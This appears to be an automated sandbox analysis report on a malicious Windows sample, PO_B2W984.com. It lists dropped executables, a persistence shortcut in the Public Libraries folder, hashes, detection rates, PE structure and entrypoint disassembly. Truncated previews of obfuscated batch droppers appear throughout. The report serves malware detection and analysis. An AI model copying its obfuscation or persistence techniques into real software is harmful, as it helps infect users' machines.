                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                      Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):70656
                                                                                                                                      Entropy (8bit):4.910353963160109
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                      MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                      SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                      SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                      SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: F7Xu8bRnXT.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):665670656
                                                                                                                                      Entropy (8bit):7.99999937128988
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:
                                                                                                                                      MD5:785BCB4933871B92E40A89544BFA615E
                                                                                                                                      SHA1:926A493B8D95768B438BB11E5D7CFDE0F70D213D
                                                                                                                                      SHA-256:75A815D3B71446F95DD5042E58737063A148761817DB1F65F8283A26614415A8
                                                                                                                                      SHA-512:500D2D52A7666B861E228EA7A903351D8EDA13922BACC9E75C5F86EC4474CE882ED135D569743640C2217766463535C994E951F8131DE6BDD3D8F05EC43CB7C3
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1820
                                                                                                                                      Entropy (8bit):2.4182561384360683
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8PsXUCV/tz0/CSL4WWeMNDyWlT9KWQ17+AUvO4Zv7L1Q17+ANCNfBf4t2YCBTo8:80rWLqeMNmG9KXR+O4ZvPqRMjJT
                                                                                                                                      MD5:8C754917840362CAC6F2226DB0CC8DDE
                                                                                                                                      SHA1:BB221F2D76706A961AC0F561D9862507A742F40E
                                                                                                                                      SHA-256:07E44921181835B94E444DAB410EF555932977AF140E0ED89E5F3841C613F7BE
                                                                                                                                      SHA-512:92BD4A18FDEBA2CE1C424ADFBBF05C0FA5B342ED498C5621679666142FC04C921883EC82D0D404D2AAA9D8BCBE9AE65D42291E1959388B4F4CFCF3561960327B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@......................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8556
                                                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):46543
                                                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):679957
                                                                                                                                      Entropy (8bit):7.4483963454083435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
                                                                                                                                      MD5:25A482D7B6698E7666A523C910799F13
                                                                                                                                      SHA1:18B17A1E14069E747F5076F97A9654D8D99E5ADA
                                                                                                                                      SHA-256:4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
                                                                                                                                      SHA-512:5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2145792
                                                                                                                                      Entropy (8bit):7.486736694173577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:EdqswGco/j1HEFW1bB9HI8QrwiycY5vtxq5GtGco/j1HEFW1bB9HI8QrwiycY5vF:E8swjWdb1jWdbJ
                                                                                                                                      MD5:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      SHA1:1B12238410D619F0797042CA0777D7C05B08F410
                                                                                                                                      SHA-256:9654CBD553DF628F50A99EC6F8B405901898C3C9EB99C8A3BA4FBD586290948B
                                                                                                                                      SHA-512:7E83E17A42F8C2FC0A8743AD43FF592CBE48BEBE075889C98091424E395C72C50F807DE5746F8A5E9CB07466798AF12462AFC52EDC5B3374F64ADA3CCE357AB9
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................*...........8.......@....@..........................P!..................@...........................@...%......TF.......................l...................................................G...............................text............ .................. ..`.itext..T....0.......$.............. ..`.data... ....@......................@....bss.....6...............................idata...%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...l.......n..................@..B.rsrc...TF.......H...v..............@..@.............@!....... .............@..@................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):175800
                                                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):104
                                                                                                                                      Entropy (8bit):5.156734550410475
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxbVbAIA5ov:HRYFVmTWDyzKNafExbVs2v
                                                                                                                                      MD5:FB3D5D8A14664ED4C4E754BA1C68AC30
                                                                                                                                      SHA1:706580AE564D3FB316FFCCB74AF60BD21424923B
                                                                                                                                      SHA-256:EC200831AA481803FB7421C284F619BA6C32FD19E06EFAEDF7D7F47E68A591AF
                                                                                                                                      SHA-512:0DF92E6DE01CE72C294EE8CB418C4579AE8A6E0E9A455103E612CEA6CDA88B51EBB247C690FD8DA9C92009C0340A4593430B3ADA2F934C13260C4ACCB337F23E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=900607..HotKey=80..
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15789
                                                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.486736694173577
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.66%
                                                                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      File name:PO_B2W984.com
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5:f7d9ffe252e26320f26a76fc3f239c50
                                                                                                                                      SHA1:1b12238410d619f0797042ca0777d7c05b08f410
                                                                                                                                      SHA256:9654cbd553df628f50a99ec6f8b405901898c3c9eb99c8a3ba4fbd586290948b
                                                                                                                                      SHA512:7e83e17a42f8c2fc0a8743ad43ff592cbe48bebe075889c98091424e395c72c50f807de5746f8a5e9cb07466798af12462afc52edc5b3374f64ada3cce357ab9
                                                                                                                                      SSDEEP:49152:EdqswGco/j1HEFW1bB9HI8QrwiycY5vtxq5GtGco/j1HEFW1bB9HI8QrwiycY5vF:E8swjWdb1jWdbJ
                                                                                                                                      TLSH:8FA5D033E960D578ECBA37FC5C1752D8D44D3E752EDAF47D21DAAA841721B223868283
                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                      Entrypoint:0x46380c
                                                                                                                                      Entrypoint Section:.itext
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                      DLL Characteristics:
                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:c1249b2dc81238026e760db6b73b768c
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                      mov eax, 00462D44h
                                                                                                                                      call 00007FA398A57E7Dh
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007FA398AA537Dh
                                                                                                                                      mov ecx, dword ptr [0052ED90h]
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov edx, dword ptr [004628E4h]
                                                                                                                                      call 00007FA398AA537Dh
                                                                                                                                      mov eax, dword ptr [0052EF7Ch]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      call 00007FA398AA53F1h
                                                                                                                                      call 00007FA398A55C60h
                                                                                                                                      lea eax, dword ptr [eax+00h]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x134000 | 0x25ac | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x140000 | 0xd4654 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x139000 | 0x6cd8 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x138000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x13471c | 0x5dc | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x61fe4 | 0x62000 | 54bccdfb230aecbacc5dc4836bb40e62 | False | 0.5120401187818877 | data | 6.547957158295364 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x63000 | 0x854 | 0xa00 | f9a41c84e5fdd4f1ee3395fb29f42e84 | False | 0.523828125 | data | 5.584231542920759 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x64000 | 0xcb120 | 0xcb200 | 27dff9af1314283e7c0c621093c35f58 | False | 0.6564915865384615 | data | 7.465742401908973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x130000 | 0x369c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x134000 | 0x25ac | 0x2600 | 902f126de362c99ae2b20adf830938cb | False | 0.31938733552631576 | data | 5.045673551358589 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x137000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
